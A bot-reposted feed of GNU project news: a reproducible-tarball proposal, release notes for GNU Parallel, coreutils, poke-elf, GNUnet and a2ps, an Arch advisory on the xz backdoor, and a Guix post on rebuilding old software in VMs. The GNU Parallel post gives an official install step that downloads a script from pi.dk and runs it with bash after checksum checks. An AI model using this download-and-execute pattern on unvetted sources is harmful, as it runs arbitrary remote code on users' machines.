#gnu

federatica_bot@federatica.space

Simon Josefsson: Towards reproducible minimal source code tarballs? On *-src.tar.gz

While the work to analyze the xz backdoor is in progress, several ideas have been suggested to improve the entire software supply chain ecosystem. Some of those ideas are good, some are at best irrelevant and harmless, and some are plain bad. I’d like to attempt to formalize one idea (it remains to be seen which category it belongs to), which has been discussed before, but the context in which the idea can be appreciated has not been as clear as it is today.

  1. Reproducible source tarballs. The idea is that published source tarballs should be possible to reproduce independently somehow, and that this should be continuously tested and verified — preferably as part of the upstream project’s continuous integration system (e.g., a GitHub action or GitLab pipeline). While nominally this looks easy to achieve, there are some complex matters involved, for example: what timestamps should be used for files in the tarball? I’ve brought up this aspect before.
  2. Minimal source tarballs without generated vendor files. Most GNU Autoconf/Automake-based tarballs ship pre-generated files which are important for bootstrapping on exotic systems that do not have the required dependencies. For the bootstrapping story to succeed, this approach is important to support. However, it has become clear that this practice raises significant costs and risks. Most modern GNU/Linux distributions have all the required dependencies and actually prefer to re-build everything from source code. These pre-generated extra files introduce uncertainty to that process.

My strawman proposal to improve things is to define a new tarball format, *-src.tar.gz, with at least the following properties:

  1. The tarball should allow users to build the project, which is the entire purpose of all this. This means that at least all source code for the project has to be included.
  2. The tarballs should be signed, for example with PGP or minisign.
  3. The tarball should be possible to reproduce bit-by-bit by a third party using upstream’s version controlled sources and a pointer to which revision was used (e.g., git tag or git commit).
  4. The tarball should not require an Internet connection to download things.
    • Corollary: every external dependency either has to be explicitly documented as such (e.g., gcc and GnuTLS), or included in the tarball.
    • Observation: This means including all *.po gettext translations which are normally downloaded when building from version controlled sources.
  5. The tarball should contain everything required to build the project from source using as much externally released versioned tooling as possible. This is the “minimal” property lacking today.
    • Corollary: This means including a vendored copy of OpenSSL or libz is not acceptable: link to them as external projects.
    • Open question: How about non-released external tooling such as gnulib or autoconf archive macros? This is a bit more delicate: most distributions just package one current version of gnulib or the autoconf archive, not previous versions. While this could change: distributions could package the gnulib git repository (up to some current version) and the autoconf archive git repository, and packages could be set up to extract the version they need (gnulib’s ./bootstrap already supports this via the --gnulib-refdir parameter). But this is not normally in place.
    • Suggested Corollary: The tarball should contain content from git submodules such as gnulib and the necessary Autoconf archive M4 macros required by the project.
  6. Similar to how the GNU project specifies the ./configure interface, we need a documented interface for how to bootstrap the project. I suggest using the already well-established idiom of running ./bootstrap to set up the package so that it can later be built via ./configure. Of course, some projects do not use the autotools ./configure interface and will not follow this aspect either, but just as most build systems that compete with autotools provide instructions on how to build the project, they should document a similar interface for bootstrapping the source tarball to allow building; a sketch of the intended workflow follows this list.
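As a rough sketch of what that workflow could look like (the project name, tag, and the make target that emits the tarball are hypothetical):

# Reproduce the *-src.tar.gz bit-by-bit from version-controlled sources (property 3):
git clone https://example.org/foo.git && cd foo && git checkout v1.2.3
./bootstrap && make src-dist          # hypothetical target producing foo-1.2.3-src.tar.gz
sha256sum foo-1.2.3-src.tar.gz ../upstream/foo-1.2.3-src.tar.gz   # hashes must match

# Build from the tarball itself (properties 1 and 6):
tar xf foo-1.2.3-src.tar.gz && cd foo-1.2.3
./bootstrap && ./configure && make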

If tarballs that achieve the above goals were available from popular upstream projects, distributions could more easily use them instead of current tarballs that include pre-generated content. The advantage would be that the build process is not tainted by “unnecessary” files. We need to develop tools for maintainers to create these tarballs, similar to make dist, which generates today’s foo-1.2.3.tar.gz files.

I think one common argument against this approach will be: why bother with all that, and not just use git-archive output? Or avoid the entire tarball approach and move directly towards version-controlled checkouts, referring to upstream releases as a git URL and commit tag or id. My counter-argument is that this optimizes for packagers’ benefit at the cost of upstream maintainers: most upstream maintainers do not want to store gettext *.po translations in their source code repository. A compromise between the needs of maintainers and packagers is useful, and this *-src.tar.gz tarball approach is the indirection we need to achieve it.

What do you think?

#gnu #gnuorg #opensource

federatica_bot@federatica.space

parallel @ Savannah: GNU Parallel 20240322 ('Sweden') released [stable]

GNU Parallel 20240322 ('Sweden') has been released. It is available for download at: lbry://@GnuParallel:4

Quote of the month:

GNU parallel ftw

-- hostux.social/@rmpr @_paulmairo@twitter

New in this release:

  • Bug fixes and man page updates.

GNU Parallel - For people who live life in the parallel lane.

If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.

About GNU Parallel

GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.

If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.

GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.
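For instance, here is a shell loop and its GNU Parallel equivalent (a hedged illustration; the filenames are made up):

# Sequential loop:
for f in *.log; do gzip "$f"; done

# Same work run in parallel, with output serialized as if sequential:
parallel gzip ::: *.log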

For example you can run this to convert all jpeg files into png and gif files and have a progress bar:

parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif

Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:

find . -name '*.jpg' |
  parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200

You can find more about GNU Parallel at: http://www.gnu.org/s/parallel/

You can install GNU Parallel in just 10 seconds with:

$ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
   fetch -o - http://pi.dk/3 ) > install.sh
$ sha1sum install.sh | grep 883c667e01eed62f975ad28b6d50e22a
12345678 883c667e 01eed62f 975ad28b 6d50e22a
$ md5sum install.sh | grep cc21b4c943fd03e93ae1ae49e28573c0
cc21b4c9 43fd03e9 3ae1ae49 e28573c0
$ sha512sum install.sh | grep ec113b49a54e705f86d51e784ebced224fdff3f52
79945d9d 250b42a4 2067bb00 99da012e c113b49a 54e705f8 6d51e784 ebced224
fdff3f52 ca588d64 e75f6033 61bd543f d631f592 2f87ceb2 ab034149 6df84a35
$ bash install.sh

Watch the intro video on http://www.youtube.com/playlist?list=PL284C9FF2488BC6D1

Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.

When using programs that use GNU Parallel to process data for publication please cite:

O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/10.5281/zenodo.1146014.

If you like GNU Parallel:

  • Give a demo at your local user group/team/colleagues
  • Post the intro videos on Reddit/Diaspora*/forums/blogs/Identi.ca/Google+/Twitter/Facebook/LinkedIn/mailing lists
  • Get the merchandise https://gnuparallel.threadless.com/designs/gnu-parallel
  • Request or write a review for your favourite blog or magazine
  • Request or build a package for your favourite distribution (if it is not already there)
  • Invite me for your next conference

If you use programs that use GNU Parallel for research:

  • Please cite GNU Parallel in your publications (use --citation)

If GNU Parallel saves you money:

  • (Have your company) donate to FSF https://my.fsf.org/donate/

About GNU SQL

GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.

The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.
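For instance (a hedged sketch; the DBURL, credentials, and table are made up):

# Run a query against a MySQL database identified by a DBURL:
sql mysql://user:pass@dbhost:3306/mydb "SELECT COUNT(*) FROM users;"

# Leaving out the command drops you into that database's interactive shell:
sql mysql://user:pass@dbhost/mydb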

When using GNU SQL for a publication please cite:

O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.

About GNU Niceload

GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.
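For instance, a hedged example (the --load option name is an assumption here; consult niceload(1) for the exact flags):

niceload --load 4 tar cJf backup.tar.xz /home   # assumed option: suspend tar whenever the load average exceeds 4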

#gnu #gnuorg #opensource

federatica_bot@federatica.space

poke @ Savannah: poke-elf 1.0 released

I am happy to announce the first release of poke-elf, version 1.0.

The tarball poke-elf-1.0.tar.gz is now available at https://ftp.gnu.org/gnu/poke/poke-elf-1.0.tar.gz.

poke-elf (https://jemarch.net/poke-elf) is a full-fledged GNU poke pickle for editing ELF object files, executables, shared libraries and core dumps. It supports many architectures and extensions.

This pickle is part of the GNU poke project.

GNU poke (https://jemarch.net/poke) is an interactive, extensible editor for binary data. Not limited to editing basic entities such as bits and bytes, it provides a full-fledged procedural, interactive programming language designed to describe data structures and to operate on them.
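For a taste of what this enables, here is a hedged sketch of an interactive session (the type and field names follow the ELF pickle's conventions and may differ in detail):

$ poke foo.o
(poke) load elf
(poke) var ehdr = Elf64_Ehdr @ 0#B
(poke) ehdr.e_type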

Please send us comments, suggestions, bug reports, patches, questions, complaints, bitcoins, or whatever, to poke-devel@gnu.org.

Happy ELF poking!

---

Jose E. Marchesi

Frankfurt am Main

30 March 2024

#gnu #gnuorg #opensource

federatica_bot@federatica.space

Parabola GNU/Linux-libre: [arch-announce] The xz package has been backdoored

From: "Arch Linux: Recent news updates: David Runge" arch-announce@lists.archlinux.org

TL;DR: Upgrade your systems and container images now!

As many of you may have already read [1], the upstream release tarballs for xz in version 5.6.0 and 5.6.1 contain malicious code which adds a backdoor.

This vulnerability is tracked in the Arch Linux security tracker [2].

The xz packages prior to version 5.6.1-2 (specifically 5.6.0-1 and 5.6.1-1) contain this backdoor.

We strongly advise against using affected release artifacts and instead downloading what is currently available as latest version!

Upgrading the system

It is strongly advised to do a full system upgrade right away if your system currently has xz version 5.6.0-1 or 5.6.1-1 installed:

pacman -Syu

Regarding sshd authentication bypass/code execution

From the upstream report [1]:

openssh does not directly use liblzma. However debian and several other distributions patch openssh to support systemd notification, and libsystemd does depend on lzma.

Arch does not directly link openssh to liblzma, and thus this attack vector is not possible. You can confirm this by issuing the following command:

ldd "$(command -v sshd)"

However, out of an abundance of caution, we advise users to remove the malicious code from their system by upgrading either way. This is because other, yet-to-be-discovered methods to exploit the backdoor could exist.

URL: https://archlinux.org/news/the-xz-package-has-been-backdoored/

#gnu #gnuorg #opensource

federatica_bot@federatica.space

coreutils @ Savannah: coreutils-9.5 released [stable]

This is to announce coreutils-9.5, a stable release.

See the NEWS below for a summary of changes.

There have been 187 commits by 18 people in the 30 weeks since 9.4.

Thanks to everyone who has contributed!

The following people contributed changes to this release:

Aearil (1)                  Petr Malat (1)
Bruno Haible (3)            Pádraig Brady (75)
Christian Göttsche (1)      Samuel Tardieu (1)
Collin Funk (4)             Stephane Chazelas (1)
Daan De Meyer (1)           Stephen Kitt (1)
Greg Wooledge (1)           Sylvestre Ledru (3)
Grisha Levit (2)            Ville Skyttä (1)
Michel Lind (1)             dann frazier (1)
Paul Eggert (89)            lvgenggeng (1)

Pádraig [on behalf of the coreutils maintainers]

==================================================================

Here is the GNU coreutils home page:

https://gnu.org/s/coreutils/

For a summary of changes and contributors, see:

https://git.sv.gnu.org/gitweb/?p=coreutils.git;a=shortlog;h=v9.5

or run this command from a git-cloned coreutils directory:

git shortlog v9.4..v9.5

Here are the compressed sources:

https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.gz (15MB)

https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.xz (5.8MB)

Here are the GPG detached signatures:

https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.gz.sig

https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.xz.sig

Use a mirror for higher download bandwidth:

https://www.gnu.org/order/ftp.html

Here are the SHA1 and SHA256 checksums:

3285114d93b39e5e4643b0846f570203a5e4c97b coreutils-9.5.tar.gz

dnrmoilQ7ELzul98Heed0ngA7o6bhkLaXe21l0oXQeU= coreutils-9.5.tar.gz

867fed7ce2ee15c5150a355a5f3a3b50578cf78d coreutils-9.5.tar.xz

zTKO3qyS9qZl3p8yPJO3Eq8YWLwuDYjz9xAEaUcKG4o= coreutils-9.5.tar.xz

Verify the base64 SHA256 checksum with cksum -a sha256 --check from coreutils-9.2 or OpenBSD's cksum since 2007.
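For example, to check the .tar.gz checksum above using cksum's tagged format (a hedged sketch; it assumes the tarball is in the current directory):

echo 'SHA256 (coreutils-9.5.tar.gz) = dnrmoilQ7ELzul98Heed0ngA7o6bhkLaXe21l0oXQeU=' \
  | cksum -a sha256 --check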

Use a .sig file to verify that the corresponding file (without the .sig suffix) is intact. First, be sure to download both the .sig file and the corresponding tarball. Then, run a command like this:

gpg --verify coreutils-9.5.tar.gz.sig

The signature should match the fingerprint of the following key:

pub rsa4096/0xDF6FD971306037D9 2011-09-23 [SC]

Key fingerprint = 6C37 DC12 121A 5006 BC1D B804 DF6F D971 3060 37D9

uid [ultimate] Pádraig Brady P@draigBrady.com

uid [ultimate] Pádraig Brady pixelbeat@gnu.org

If that command fails because you don't have the required public key, or that public key has expired, try the following commands to retrieve or refresh it, and then rerun the 'gpg --verify' command.

gpg --locate-external-key P@draigBrady.com

gpg --recv-keys DF6FD971306037D9

wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=coreutils&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU keyring:

wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg

gpg --keyring gnu-keyring.gpg --verify coreutils-9.5.tar.gz.sig

This release was bootstrapped with the following tools:

Autoconf 2.72c.32-cb6fb

Automake 1.16.5

Gnulib v0.1-7293-g259829e78b

Bison 3.8.2

NEWS

  • Noteworthy changes in release 9.5 (2024-03-28) [stable]

** Bug fixes

chmod -R now avoids a race where an attacker may replace a traversed file with a symlink, causing chmod to operate on an unintended file. [This bug was present in "the beginning".]

cp, mv, and install no longer issue spurious diagnostics like "failed to preserve ownership" when copying to GNU/Linux CIFS file systems. They do this by working around some Linux CIFS bugs.

cp --no-preserve=mode will correctly maintain set-group-ID bits for created directories. Previously on systems that didn't support ACLs, cp would have reset the set-group-ID bit on created directories. [bug introduced in coreutils-8.20]

join and uniq now support multi-byte characters better. For example, 'join -tX' now works even if X is a multi-byte character, and both programs now treat multi-byte characters like U+3000 IDEOGRAPHIC SPACE as blanks if the current locale treats them so.

numfmt options like --suffix no longer have an arbitrary 127-byte limit. [bug introduced with numfmt in coreutils-8.21]

mktemp with --suffix now better diagnoses templates with too few X's. Previously it conflated the insignificant --suffix in the error. [bug introduced in coreutils-8.1]

sort again handles thousands-grouping characters in single-byte locales where the grouping character is greater than CHAR_MAX, e.g. on signed-character platforms with a 0xA0 (aka &nbsp) grouping character. [bug introduced in coreutils-9.1]

split --line-bytes with a mixture of very long and short lines no longer overwrites the heap (CVE-2024-0684). [bug introduced in coreutils-9.2]

tail no longer mishandles input from files in /proc and /sys file systems, on systems with a page size larger than the stdio BUFSIZ. [This bug was present in "the beginning".]

timeout avoids a narrow race condition, where it might kill arbitrary processes after a failed process fork. [bug introduced with timeout in coreutils-7.0]

timeout avoids a narrow race condition, where it might fail to kill monitored processes immediately after forking them. [bug introduced with timeout in coreutils-7.0]

wc no longer fails to count unprintable characters as parts of words. [bug introduced in textutils-2.1]

** Changes in behavior

base32 and base64 no longer require padding when decoding. Previously an error was given for non-padded encoded data.

base32 and base64 have improved detection of corrupted encodings. Previously encodings with non-zero padding bits were accepted.

basenc --base16 -d now supports lower case hexadecimal characters. Previously an error was given for lower case hex digits.

cp --no-clobber and mv -n no longer exit with failure status if existing files are encountered in the destination. Instead they revert to the behavior from before v9.2, silently skipping existing files.

ls --dired now implies long format output without hyperlinks enabled, and will take precedence over previously specified formats or hyperlink mode.

numfmt will accept lowercase 'k' to indicate Kilo or Kibi units on input, and uses lowercase 'k' when outputting such units in '--to=si' mode.

pinky no longer tries to canonicalize the user's login location by default, instead requiring the new --lookup option to enable this often slow feature.

wc no longer ignores encoding errors when counting words. Instead, it treats them as non-white-space.

** New features

chgrp now accepts the --from=OWNER:GROUP option to restrict changes to files with matching current OWNER and/or GROUP, as already supported by chown(1).

chmod adds support for the -h, -H, -L, -P, and --dereference options, providing more control over symlink handling. This supports more secure handling of CLI arguments, and is more consistent with chown, and with chmod on other systems.

cp now accepts the --keep-directory-symlink option (like tar), to preserve and follow existing symlinks to directories in the destination.

cp and mv now accept the --update=none-fail option, which is similar to the --no-clobber option, except that existing files are diagnosed, and the command exits with failure status if existing files are encountered. The -n,--no-clobber option is best avoided due to platform differences.

env now accepts the -a,--argv0 option to override the zeroth argument of the command being executed.

mv now accepts an --exchange option, which causes the source and destination to be exchanged. It should be combined with --no-target-directory (-T) if the destination is a directory. The exchange is atomic if source and destination are on a single file system that supports atomic exchange; --exchange is not yet supported in other situations.

od now supports printing IEEE half-precision floating point with -t fH, or brain 16-bit floating point with -t fB, where supported by the compiler.

tail now supports following multiple processes, with repeated --pid options.
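A few hedged usage sketches of the options described above (all paths and names are made up):

# Swap two directories atomically (where the file system supports it):
mv --exchange -T /srv/www-blue /srv/www-green

# Run a command with a different zeroth argument:
env --argv0 myshell /bin/bash -c 'echo "$0"'    # prints: myshell

# Copy, but fail loudly if the destination already exists:
cp --update=none-fail config.new /etc/app/config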

** Improvements

cp, mv, install, cat, and split now read and write a minimum of 256KiB at a time. This was previously 128KiB, and increasing to 256KiB was seen to increase throughput by 10-20% when reading cached files on modern systems.

env, kill, and timeout now support unnamed signals. kill(1) for example now supports sending such signals, and env(1) will list them appropriately.

SELinux operations in file copy operations are now more efficient, avoiding unneeded MCS/MLS label translation.

sort no longer dynamically links to libcrypto unless -R is used. This decreases startup overhead in the typical case.

wc is now much faster in single-byte locales and somewhat faster in multi-byte locales.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

FSF News: Alyssa Rosenzweig, who spearheaded the reverse-engineering of Apple's GPU, to keynote LibrePlanet

BOSTON, Massachusetts, USA -- March 27, 2024 -- The Free Software Foundation (FSF) today announced Alyssa Rosenzweig, who reverse-engineered Apple's current line of graphics processing units (GPU), as keynote speaker for LibrePlanet 2024. LibrePlanet 2024: Cultivating Community is the sixteenth edition of the FSF's conference on ethical technology and user freedom and will be held on May 4 and 5 at the Wentworth Institute of Technology in Boston, MA, as well as online.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

GNU Guix: Adventures on the quest for long-term reproducible deployment


Rebuilding software five years later, how hard can it be? It can’t be that hard, especially when you pride yourself on having a tool that can travel in time and that does a good job at ensuring reproducible builds, right?

In hindsight, we can tell you: it’s more challenging than it seems. Users attempting to travel 5 years back with guix time-machine are (or were) unavoidably going to hit bumps on the road—a real problem because that’s one of the use cases Guix aims to support well, in particular in a reproducible research context.

In this post, we look at some of the challenges we face while traveling back, how we are overcoming them, and open issues.

The vision

First of all, one clarification: Guix aims to support time travel, but we’re talking of a time scale measured in years, not in decades. We know all too well that this is already very ambitious—it’s something that probably nobody except Nix and Guix are even trying. More importantly, software deployment at the scale of decades calls for very different, more radical techniques; it’s the work of archivists.

Concretely, Guix 1.0.0 was released in 2019 and our goal is to allow users to travel as far back as 1.0.0 and redeploy software from there, as in this example:

$ guix time-machine -q --commit=v1.0.0 -- \
     environment --ad-hoc python2 -- python
> guile: warning: failed to install locale
Python 2.7.15 (default, Jan  1 1970, 00:00:01) 
[GCC 5.5.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

(The command above uses guix environment, the predecessor of guix shell, which didn’t exist back then.) It’s only 5 years ago but it’s pretty much remote history on the scale of software evolution—in this case, that history comprises major changes in Guix itself and in Guile. How well does such a command work? Well, it depends.

The project has two build farms; bordeaux.guix.gnu.org has been keeping substitutes (pre-built binaries) of everything it built since roughly 2021, while ci.guix.gnu.org keeps substitutes for roughly two years, but there is currently no guarantee on the duration substitutes may be retained. Time traveling to a period where substitutes are available is fine: you end up downloading lots of binaries, but that’s OK, you rather quickly have your software environment at hand.

Bumps on the build road

Things get more complicated when targeting a period in time for which substitutes are no longer available, as was the case for v1.0.0 above. (And really, we should assume that substitutes won’t remain available forever: fellow NixOS hackers recently had to seriously consider trimming their 20-year-long history of substitutes because the costs are not sustainable.)

Apart from the long build times, the first problem that arises in the absence of substitutes is source code unavailability. I’ll spare you the details for this post—that problem alone would deserve a book. Suffice to say that we’re lucky that we started working on integrating Guix with Software Heritage years ago, and that there has been great progress over the last couple of years to get closer to full package source code archival (more precisely: 94% of the source code of packages available in Guix in January 2024 is archived, versus 72% of the packages available in May 2019).

So what happens when you run the time-machine command above? It brings you to May 2019, a time for which none of the official build farms had substitutes until a few days ago. Ideally, thanks to isolated build environments, you’d build things for hours or days, and in the end all those binaries will be here just as they were 5 years ago. In practice though, there are several problems that isolation as currently implemented does not address.

[Image: still from the movie “Safety Last!” with Harold Lloyd hanging from a clock on a building’s façade.]

Among those, the most frequent problem is time traps : software build processes that fail after a certain date (these are also referred to as “time bombs” but we’ve had enough of these and would rather call for a ceasefire). This plagues a handful of packages out of almost 30,000 but unfortunately we’re talking about packages deep in the dependency graph. Here are some examples:

  • OpenSSL unit tests fail after a certain date because some of the X.509 certificates they use have expired.
  • GnuTLS had similar issues; newer versions rely on datefudge to fake the date while running the tests and thus avoid that problem altogether.
  • Python 2.7, found in Guix 1.0.0, also had that problem with its TLS-related tests.
  • OpenJDK would fail to build at some point with this interesting message: Error: time is more than 10 years from present: 1388527200000 (the build system would consider that its data about currencies is likely outdated after 10 years).
  • Libgit2, a dependency of Guix, had (has?) time-dependent tests.
  • MariaDB tests started failing in 2019.

Someone traveling to v1.0.0 will hit several of these, preventing guix time-machine from completing. A serious bummer, especially to those who’ve come to Guix from the perspective of making their research workflow reproducible.

Time traps are the main road block, but there’s more! In rare cases, there’s software influenced by kernel details not controlled by the build daemon:

In a handful of cases, but important ones, builds might fail when performed on certain CPUs. We’re aware of at least two cases:

Neither time traps nor those obscure hardware-related issues can be avoided with the isolation mechanism currently used by the build daemon. This harms time traveling when substitutes are unavailable. Giving up is not in the ethos of this project though.

Where to go from here?

There are really two open questions here:

  1. How can we tell which packages need to be “fixed”, and how: building at a specific date, on a specific CPU?
  2. How can we keep those aspects of the build environment (time, CPU variant) under control?

Let’s start with #2. Before looking for a solution, it’s worth remembering where we come from. The build daemon runs build processes with a separate root file system, under dedicated user IDs, and in separate Linux namespaces, thereby minimizing interference with the rest of the system and ensuring a well-defined build environment. This technique was implemented by Eelco Dolstra for Nix in 2007 (with namespace support added in 2012), at a time where the word container had to do with boats and before “Docker” became the name of a software tool. In short, the approach consists in controlling the build environment in every detail (it’s at odds with the strategy that consists in achieving reproducible builds in spite of high build environment variability). That these are mere processes with a bunch of bind mounts makes this approach inexpensive and appealing.

Realizing we’d also want to control the build environment’s date, we naturally turn to Linux namespaces to address that—Dolstra, Löh, and Pierron already suggested something along these lines in the conclusion of their 2010 Journal of Functional Programming paper. Turns out there is now a time namespace. Unfortunately it’s limited to CLOCK_MONOTONIC and CLOCK_BOOTTIME clocks; the manual page states:

Note that time namespaces do not virtualize the CLOCK_REALTIME clock. Virtualization of this clock was avoided for reasons of complexity and overhead within the kernel.

I hear you say: What about datefudge and libfaketime? These rely on the LD_PRELOAD environment variable to trick the dynamic linker into pre-loading a library that provides symbols such as gettimeofday and clock_gettime. This is a fine approach in some cases, but it’s too fragile and too intrusive when targeting arbitrary build processes.

That leaves us with essentially one viable option: virtual machines (VMs). The full-system QEMU lets you specify the initial real-time clock of the VM with the -rtc flag, which is exactly what we need (“user-land” QEMU such as qemu-x86_64 does not support it). And of course, it lets you specify the CPU model to emulate.
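For illustration, here is a hedged QEMU invocation along those lines (the disk image name and the memory/CPU counts are made up):

qemu-system-x86_64 -cpu Skylake-Client -smp 4 -m 2048 \
  -rtc base=2020-01-01T00:00:00 \
  -drive file=build-vm.img,format=qcow2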

News from the past

Now, the question is: where does the VM fit? The author considered writing a package transformation that would change a package such that it’s built in a well-defined VM. However, that wouldn’t really help: this option didn’t exist in past revisions, and it would lead to a different build anyway from the perspective of the daemon—a different derivation.

The best strategy appeared to be offloading: the build daemon can offload builds to different machines over SSH, we just need to let it send builds to a suitably-configured VM. To do that, we can reuse some of the machinery initially developed for childhurds that takes care of setting up offloading to the VM: creating substitute signing keys and SSH keys, exchanging secret key material between the host and the guest, and so on.

The end result is a service for Guix System users that can be configured in a few lines:

(use-modules (gnu services virtualization))

(operating-system
  ;; …
  (services (append (list (service virtual-build-machine-service-type))
                    %base-services)))

The default setting above provides a 4-core VM whose initial date is January 2020, emulating a Skylake CPU from that time—the right setup for someone willing to reproduce old binaries. You can check the configuration like this:

$ sudo herd configuration build-vm
CPU: Skylake-Client
number of CPU cores: 4
memory size: 2048 MiB
initial date: Wed Jan 01 00:00:00Z 2020

To enable offloading to that VM, one has to explicitly start it, like so:

$ sudo herd start build-vm

From there on, every native build is offloaded to the VM. The key part is that with almost no configuration, you get everything set up to build packages “in the past”. It’s a Guix System only solution; if you run Guix on another distro, you can set up a similar build VM but you’ll have to go through the cumbersome process that is all taken care of automatically here.

Of course it’s possible to choose different configuration parameters:

(service virtual-build-machine-service-type
         (virtual-build-machine
          (date (make-date 0 0 00 00 01 10 2017 0)) ;further back in time
          (cpu "Westmere")
          (cpu-count 16)
          (memory-size (* 8 1024))
          (auto-start? #t)))

With a build VM with its date set to January 2020, we have been able to rebuild Guix and its dependencies along with a bunch of packages such as emacs-minimal from v1.0.0, overcoming all the time traps and other challenges described earlier. As a side effect, substitutes are now available from ci.guix.gnu.org so you can even try this at home without having to rebuild the world:

$ guix time-machine -q --commit=v1.0.0 -- build emacs-minimal --dry-run
guile: warning: failed to install locale
substitute: updating substitutes from 'https://ci.guix.gnu.org'... 100.0%
38.5 MB would be downloaded:
   /gnu/store/53dnj0gmy5qxa4cbqpzq0fl2gcg55jpk-emacs-minimal-26.2

For the fun of it, we went as far as v0.16.0, released in December 2018:

guix time-machine -q --commit=v0.16.0 -- \
  environment --ad-hoc vim -- vim --version

This is the furthest we can go since channels and the underlying mechanisms that make time travel possible did not exist before that date.

There’s one “interesting” case we stumbled upon in that process: in OpenSSL 1.1.1g (released April 2020 and packaged in December 2020), some of the test certificates are not valid before April 2020, so the build VM needs to have its clock set to May 2020 or thereabouts. Booting the build VM with a different date can be done without reconfiguring the system:

$ sudo herd stop build-vm
$ sudo herd start build-vm -- -rtc base=2020-05-01T00:00:00

The -rtc … flags are passed straight to QEMU, which is handy when exploring workarounds…

The time-travel continuous integration jobset has been set up to check that we can, at any time, travel back to one of the past releases. This at least ensures that Guix itself and its dependencies have substitutes available at ci.guix.gnu.org.

Reproducible research workflows reproduced

Incidentally, this effort rebuilding 5-year-old packages has allowed us to fix embarrassing problems. Software that accompanies research papers that followed our reproducibility guidelines could no longer be deployed, at least not without this clock twiddling effort:

It’s good news that we can now re-deploy these 5-year-old software environments with minimum hassle; it’s bad news that holding this promise took extra effort.

The ability to reproduce the environment of software that accompanies research work should not be considered a mundanity or an exercise that’s “overkill”. The ability to rerun, inspect, and modify software is the natural extension of the scientific method. Without a companion reproducible software environment, research papers are merely the advertisement of scholarship, to paraphrase Jon Claerbout.

The future

The astute reader surely noticed that we didn’t answer question #1 above:

How can we tell which packages need to be “fixed”, and how: building at a specific date, on a specific CPU?

It’s a fact that Guix so far lacks information about the date, kernel, or CPU model that should be used to build a given package. Derivations purposefully lack that information on the grounds that it cannot be enforced in user land and is rarely necessary—which is true, but “rarely” is not the same as “never”, as we saw. Should we create a catalog of date, CPU, and/or kernel annotations for packages found in past revisions? Should we define, for the long-term, an all-encompassing derivation format? If we did and effectively required virtual build machines, what would that mean from a bootstrapping standpoint?

Here’s another option: build packages in VMs running in the year 2100, say, and on a baseline CPU. We don’t need to require all users to set up a virtual build machine—that would be impractical. It may be enough to set up the project build farms so they build everything that way. This would allow us to catch time traps and year 2038 bugs before they bite.

Before we can do that, the virtual-build-machine service needs to be optimized. Right now, offloading to build VMs is as heavyweight as offloading to a separate physical build machine: data is transferred back and forth over SSH over TCP/IP. The first step will be to run SSH over a paravirtualized transport instead, such as AF_VSOCK sockets. Another avenue would be to make /gnu/store in the guest VM an overlay over the host store so that inputs do not need to be transferred and copied.

Until then, happy software (re)deployment!

Acknowledgments

Thanks to Simon Tournier for insightful comments on a previous version of this post.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

GNUnet News: GNUnet 0.21.1

GNUnet 0.21.1

This is a bugfix release for gnunet 0.21.0. It primarily addresses some connectivity issues introduced with our new transport subsystem.

Links

The GPG key used to sign is: 3D11063C10F98D14BD24D1470B0998EF86F59B6A

Note that due to mirror synchronization, not all links may be functional early after the release. For direct access try https://ftp.gnu.org/gnu/gnunet/

#gnu #gnuorg #opensource

federatica_bot@federatica.space

a2ps @ Savannah: a2ps 4.15.6 released [stable]

I am delighted to announce version 4.15.6 of GNU a2ps, the Anything to PostScript converter.

This release fixes a couple of bugs, in particular with printing (the -P flag). See below for details.

Here are the compressed sources and a GPG detached signature:

https://ftpmirror.gnu.org/a2ps/a2ps-4.15.6.tar.gz

https://ftpmirror.gnu.org/a2ps/a2ps-4.15.6.tar.gz.sig

Use a mirror for higher download bandwidth:

https://www.gnu.org/order/ftp.html

Here are the SHA1 and SHA256 checksums:

e20e8009d8812c8d960884b79aab95f235c725c0 a2ps-4.15.6.tar.gz

h/+dgByxGWkYHVuM+LZeZeWyS7DHahuCXoCY8pBvvfQ a2ps-4.15.6.tar.gz

The SHA256 checksum is base64 encoded, instead of the hexadecimal encoding that most checksum tools default to.

Use a .sig file to verify that the corresponding file (without the .sig suffix) is intact. First, be sure to download both the .sig file and the corresponding tarball. Then, run a command like this:

The signature should match the fingerprint of the following key:

pub rsa2048 2013-12-11 [SC]

2409 3F01 6FFE 8602 EF44 9BB8 4C8E F3DA 3FD3 7230

